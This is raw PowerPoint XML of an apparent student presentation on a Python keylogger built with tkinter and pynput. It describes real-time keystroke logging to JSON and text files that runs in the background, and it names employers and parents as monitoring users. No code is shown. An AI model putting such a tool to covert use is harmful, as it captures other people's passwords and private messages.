        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/RojaKoppakula/IBM_CS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10684874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6B43FA-FC4E-BECD-1AAF-14599B0BC6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114039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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D33640-7F10-4BE7-A5BF-1E3C60009244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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3" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{127D8DF8-EE3D-499C-BA7D-3C08DEE307AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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4" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C51A7E-E646-4BE9-8210-4294BD8790B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10687050" y="6134100"/>
            <a:ext cx="247650" cy="247650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0FFB976-D582-43AF-91CE-086D401ED0ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653415" y="804647"/>
            <a:ext cx="10681335" cy="567463"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" b="0" i="0" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="25" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" spc="15" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>DA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E569403-61BD-4032-9F2E-05D42A2FF085}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2081783" y="1524506"/>
            <a:ext cx="5699571" cy="4862870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>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nSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Contents</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>KeyLogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Problem Statement </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Problem Overview </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Who are the End users? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Solution and Its Value Proposition </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The WOW in the solution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Modeling </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Results </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Conclusion</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="18" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2F791E2-F5E5-43AE-AE17-65CB47B4A1AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="47625" y="3838573"/>
            <a:ext cx="4124325" cy="3009900"/>
            <a:chOff x="47625" y="3819523"/>
            <a:chExt cx="4124325" cy="3009900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="object 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E518F6B9-0FEB-4B8F-A1F0-3CEF168D14AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="466725" y="6410325"/>
              <a:ext cx="3705225" cy="295275"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D89AB08-F6A2-464F-9892-F30801357C3E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="47625" y="3819523"/>
              <a:ext cx="1733550" cy="3009898"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3646910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14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74CBEDBF-D384-4AE8-9AB6-6BD3A1CD95C1}"/>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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F8BD7CF-262C-4EB3-B167-5C8BD2235306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9591675" y="59150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6" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{320C141B-23E4-4015-91A8-E6EC6BF523CF}"/>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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDA62835-DC4E-4F25-BD2B-E6ACDC0609B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755332" y="385444"/>
            <a:ext cx="10681335" cy="1124667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" b="0" i="0" kern="1200" cap="none" spc="0" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>INTRODUCTION TO KEYLOGGER</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>- A Python-based Key Logging Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C566AD93-08C9-4300-8736-101CF1B7E52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571475" y="2246718"/>
            <a:ext cx="4137627" cy="2470559"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8594"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="8100000" algn="tr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FCBC661-993A-4AE1-8C37-1D7E59172262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="482898" y="1940875"/>
            <a:ext cx="683832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lgn="just" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Our Key Logger project aims to address the need for a reliable, efficient, and user-friendly keystroke logging solution. In today's digital world, key loggers are essential tools for monitoring and ensuring security. Existing solutions often fall short in terms of usability, performance, and data security. Our project leverages Python and `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>` to create a lightweight application that logs keystrokes in real-time with minimal system impact. This presentation will walk you through our journey, from identifying the problem and designing the solution to showcasing our results and future plans. We believe our Key Logger offers a robust and valuable tool for various users, including security professionals, employers, and parents, by combining simplicity, efficiency, and cost-effectiveness.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315105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601200" y="3464707"/>
            <a:ext cx="2590800" cy="320040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11455717" y="38544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55332" y="385444"/>
            <a:ext cx="10681335" cy="57066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US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PROBLEM STATEMENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDCD77A2-C69B-A2AD-E557-689FF1DCFA4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="563880" y="1105167"/>
            <a:ext cx="9906000"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Introduction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need for an efficient key logging solution is prevalent in various fields.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need for monitoring keyboard activities for security and user behavior analysis.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Issues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Security Monitoring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Organizations require tools to monitor unauthorized access and potential security breaches.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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Productivity Analysis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Employers need to analyze employee productivity and detect any misuse of company resources.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Parental Control</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Parents want to ensure their children’s online activities are safe and appropriate.</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Existing Challenges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Complexity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Many existing solutions are complex and difficult to use.</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User-Friendliness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Lack of intuitive interfaces makes it hard for non-technical users to operate.</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Privacy Concerns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Ensuring data is logged securely without violating privacy laws.</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05888" y="2643401"/>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92197" y="472049"/>
            <a:ext cx="10681335" cy="570669"/>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US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PROBLEM OVERVIEW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA67B09-71B3-C037-A7F0-DEB16D41A623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="676274" y="1296013"/>
            <a:ext cx="10372725" cy="5201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Our project aims to address the issues identified in the problem statement by developing a user-friendly and efficient key logger.</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Features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Key Logging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Logs keystrokes as they happen and saves them in real-time.</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JSON and Text Log Generation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Generates logs in both JSON and text formats for easy analysis.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User-Friendly GUI</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Built using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tkinter</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providing an intuitive interface for users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="just"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Technical Overview</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Libraries Used</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Python,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tkinter</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pynput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json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Functionality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Captures key presses and releases.</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Saves logs to files for later analysis.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Efficiency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Lightweight and designed to run seamlessly in the background.</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457200" y="387174"/>
            <a:ext cx="10681335" cy="570669"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16510" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WHO ARE THE END USERS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E5E07F-9758-BE5B-215E-6E46380F43A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1599620"/>
            <a:ext cx="10439400" cy="4124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Identifying the target audience for our key logging application helps in understanding its utility and designing its features accordingly.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Primary Users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Security Professionals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Monitor and detect unauthorized access attempts.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Employers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Track employee productivity and ensure resources are used appropriately.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Parents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Monitor their children’s online activities to ensure they are safe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
